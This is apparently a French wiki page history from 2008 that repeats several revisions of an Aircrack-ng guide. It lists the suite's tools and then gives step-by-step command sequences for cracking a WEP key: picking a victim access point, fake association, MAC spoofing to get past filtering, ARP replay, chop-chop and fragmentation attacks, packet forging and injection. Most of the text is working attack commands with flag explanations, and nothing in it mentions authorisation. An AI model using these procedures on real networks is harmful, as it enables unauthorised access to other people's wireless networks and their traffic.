Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-19T02:26:16Z<p>Mattoufoutu : </p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:<br />
<br />>>>macchanger --mac $mac $iface<br />
<br />et relancer la carte.<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Methode "chop-chop" et par fragmentation ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-19T01:49:15Z<p>Mattoufoutu : Aircrack-ng, outils et utilisation</p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
== Les différents types d'attaques ==<br />
'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''<br />
<br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:<br />
<br />>>>macchanger --mac $mac $iface<br />
<br />et relancer la carte.<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Methode "chop-chop" et par fragmentation ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-18T19:32:06Z<p>Mattoufoutu : </p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />ATTENTION: Cet outil n'est pas encore fonctionnel.<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
== Les différents types d'attaques ==<br />
TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT<br />
<br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:<br />
<br />macchanger --mac $mac $iface<br />
<br />et relancer la carte.<br />
<br />
=== Méthode "ARP replay" ===<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />Couper une fois la victime trouvée<br />
<br />
* Lancer la capture d'IVS:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />Laisser tourner...<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />En cas de succes, "Association successful :-)" doit s'afficher (si affiché sans le smiley, attendre)<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture</div>Mattoufoutu